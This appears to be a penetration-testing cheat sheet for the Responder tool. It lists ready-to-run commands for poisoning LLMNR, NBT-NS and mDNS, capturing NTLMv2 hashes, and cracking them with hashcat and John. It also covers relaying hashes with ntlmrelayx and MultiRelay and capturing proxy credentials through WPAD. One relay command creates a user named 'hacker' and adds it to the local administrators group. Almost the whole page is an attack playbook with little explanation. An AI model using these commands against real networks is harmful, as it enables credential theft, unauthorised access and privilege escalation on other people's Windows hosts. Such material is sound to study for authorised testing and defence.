Responder — LLMNR/NBT-NS Poisoning

Responder poisons LLMNR, NBT-NS, and mDNS to capture NTLMv2 hashes from Windows hosts on the local network.

12 views Apr 2026 lazyhackers

Basic Usage (5)

responder -I eth0 -rdwv

Start Responder with rogue DHCP, DNS, WPAD, verbose

responder basic poison

responder -I eth0 -A

Analyze mode only — passive, no poisoning

responder analyze passive

responder -I eth0

Default mode — LLMNR + NBT-NS poison

responder default

responder -I eth0 -P

Enable ProxyAuth (WPAD credential capture)

responder wpad proxy

responder -I eth0 -f

Fingerprint hosts before poisoning

responder fingerprint

Cracking Captured Hashes (3)

cat /usr/share/responder/logs/SMB-NTLMv2-*.txt

View captured NTLMv2 hashes

hashes view

hashcat -m 5600 hashes.txt /usr/share/wordlists/rockyou.txt

Crack NTLMv2 hashes with Hashcat

hashcat crack ntlmv2

john hashes.txt --wordlist=rockyou.txt --format=netntlmv2

Crack NTLMv2 with John

john crack ntlmv2

Relay Attacks (with ntlmrelayx) (4)

responder -I eth0 --lm --disable-ess

Downgrade to NTLMv1 (for relay)

relay ntlmv1 downgrade

impacket-ntlmrelayx -tf targets.txt -smb2support

Relay captured hashes to target list

relay ntlmrelayx

impacket-ntlmrelayx -tf targets.txt -smb2support -c "net user hacker Password1 /add && net localgroup administrators hacker /add"

Relay + create admin user

relay privesc admin

# Edit /etc/responder/Responder.conf: set SMB=Off, HTTP=Off before relay

Disable Responder SMB/HTTP servers for relay to work

relay config

MultiRelay & WPAD (2)

python MultiRelay.py -t 10.10.10.1 -u ALL

MultiRelay attack against specific target

multirelay

# WPAD attack: responder -I eth0 -w -P captures proxy credentials

WPAD + ProxyAuth captures plaintext creds from IE/Chrome

wpad proxy